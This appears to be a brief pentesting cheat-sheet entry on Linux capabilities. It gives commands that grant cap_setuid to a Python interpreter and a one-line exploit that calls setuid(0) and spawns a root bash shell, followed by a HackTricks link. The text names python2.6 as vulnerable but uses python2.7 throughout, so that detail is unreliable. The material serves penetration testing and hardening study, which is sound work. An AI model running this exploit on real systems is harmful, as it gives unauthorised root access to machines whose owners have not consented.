Linux capabilities
Exploitation example
In the following example the binary /usr/bin/python2.6 is found vulnerable to privesc:
setcap cap_setuid+ep /usr/bin/python2.7
/usr/bin/python2.7 = cap_setuid+ep
#Exploit
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'
More
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities#user-capabilities